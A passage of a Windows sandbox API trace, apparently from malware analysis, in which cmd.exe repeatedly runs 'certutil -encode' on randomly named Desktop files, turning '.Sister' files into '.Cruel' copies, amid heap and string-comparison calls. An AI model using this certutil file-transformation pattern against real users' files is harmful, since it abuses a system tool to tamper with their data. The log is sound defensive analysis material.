RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63b30, Size=0x7e) returned 0x21ed8d63b30 [0215.079] GetProcessHeap () returned 0x21ed8c70000 [0215.079] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63b30) returned 0x7e [0215.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.079] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.079] GetLastError () returned 0x2 [0215.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.079] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.079] GetLastError () returned 0x2 [0215.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.080] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0215.080] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0215.080] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.080] GetLastError () returned 0x2 [0215.080] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0215.080] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0215.080] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0215.080] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0215.080] ??_V@YAXPEAX@Z () returned 0x1 [0215.080] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0215.081] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0215.081] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0215.081] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0215.081] GetProcessHeap () returned 0x21ed8c70000 [0215.081] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.082] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.083] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.083] GetProcessHeap () returned 0x21ed8c70000 [0215.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0215.083] GetProcessHeap () returned 0x21ed8c70000 [0215.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95820 [0215.083] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.083] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0215.084] _get_osfhandle (_FileHandle=0) returned 0x4c [0215.084] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0215.084] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xd14, dwThreadId=0xd1c)) returned 1 [0215.094] CloseHandle (hObject=0xa8) returned 1 [0215.094] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.094] GetProcessHeap () returned 0x21ed8c70000 [0215.094] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0215.094] GetEnvironmentStringsW () returned 0x21ed9980080* [0215.094] GetProcessHeap () returned 0x21ed8c70000 [0215.094] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0215.095] FreeEnvironmentStringsA (penv="=") returned 1 [0215.095] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0215.484] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0215.484] CloseHandle (hObject=0xa4) returned 1 [0215.484] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0215.484] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0215.484] GetProcessHeap () returned 0x21ed8c70000 [0215.485] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0215.485] GetEnvironmentStringsW () returned 0x21ed9980080* [0215.485] GetProcessHeap () returned 0x21ed8c70000 [0215.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0215.485] FreeEnvironmentStringsA (penv="=") returned 1 [0215.485] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.485] GetProcessHeap () returned 0x21ed8c70000 [0215.485] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0215.485] GetEnvironmentStringsW () returned 0x21ed9980080* [0215.485] GetProcessHeap () returned 0x21ed8c70000 [0215.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0215.485] FreeEnvironmentStringsA (penv="=") returned 1 [0215.485] GetProcessHeap () returned 0x21ed8c70000 [0215.485] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95820) returned 1 [0215.485] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0215.486] ??_V@YAXPEAX@Z () returned 0x1 [0215.486] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="45AyVVfixDb.avi.Sister", cAlternateFileName="")) returned 1 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d639c0, Size=0x188) returned 0x21ed9980da0 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980da0) returned 0x188 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a7c0 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a7c0, Size=0x58) returned 0x21ed937a7c0 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a7c0) returned 0x58 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a830 [0215.486] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0215.486] GetProcessHeap () returned 0x21ed8c70000 [0215.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bc10 [0215.486] ??_V@YAXPEAX@Z () returned 0x1 [0215.486] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0215.486] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d000 [0215.487] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0215.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce20 [0215.487] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0215.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xab027e28, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xab027e28, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0215.487] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0215.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="45AyVVfixDb.avi.Sister", cAlternateFileName="45AYVV~1.SIS")) returned 0x21ed8c7ca60 [0215.488] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0215.488] _wcsnicmp (_String1="45AYVV~1.SIS", _String2="45AyVVfixDb.avi.Sister", _MaxCount=0x16) returned 24 [0215.488] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0215.488] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0215.488] GetProcessHeap () returned 0x21ed8c70000 [0215.488] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8610 [0215.488] ??_V@YAXPEAX@Z () returned 0x1 [0215.488] ??_V@YAXPEAX@Z () returned 0x1 [0215.488] GetProcessHeap () returned 0x21ed8c70000 [0215.488] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a830, Size=0x1e0) returned 0x21ed937a830 [0215.488] GetProcessHeap () returned 0x21ed8c70000 [0215.488] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a830) returned 0x1e0 [0215.488] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0215.488] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.488] GetFileType (hFile=0x50) returned 0x2 [0215.488] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.488] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0215.489] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.489] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0215.495] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0215.496] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0215.496] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0215.496] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0215.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.496] GetFileType (hFile=0x50) returned 0x2 [0215.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.496] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0215.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.496] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.497] GetFileType (hFile=0x50) returned 0x2 [0215.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.497] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0215.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.498] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a7d0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937a7d0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0215.498] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\" ") returned 58 [0215.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.498] GetFileType (hFile=0x50) returned 0x2 [0215.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.498] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0215.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.499] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3a) returned 1 [0215.499] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0215.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.499] GetFileType (hFile=0x50) returned 0x2 [0215.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.499] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0215.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.501] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0215.627] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0215.696] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0215.696] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0215.696] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0215.696] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0215.696] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0215.696] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0215.696] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0215.696] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0215.696] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0215.696] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0215.696] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0215.696] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0215.696] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0215.697] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0215.697] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0215.697] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0215.697] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0215.697] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0215.697] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0215.697] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0215.697] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0215.697] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0215.697] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0215.697] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0215.697] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0215.697] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0215.697] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0215.697] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0215.697] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0215.697] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0215.697] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0215.697] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0215.697] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0215.697] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0215.697] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0215.697] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0215.697] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0215.697] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0215.697] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0215.697] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0215.698] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0215.698] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0215.698] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0215.698] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0215.698] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0215.698] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0215.698] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0215.698] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0215.698] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0215.698] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0215.698] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0215.698] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0215.698] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0215.698] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0215.698] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0215.698] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0215.698] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0215.698] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0215.698] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0215.698] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0215.698] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0215.698] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0215.698] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0215.698] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0215.698] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0215.698] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0215.698] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0215.698] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0215.699] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0215.699] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0215.699] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0215.699] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0215.699] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0215.699] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0215.699] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0215.699] _wcsicmp 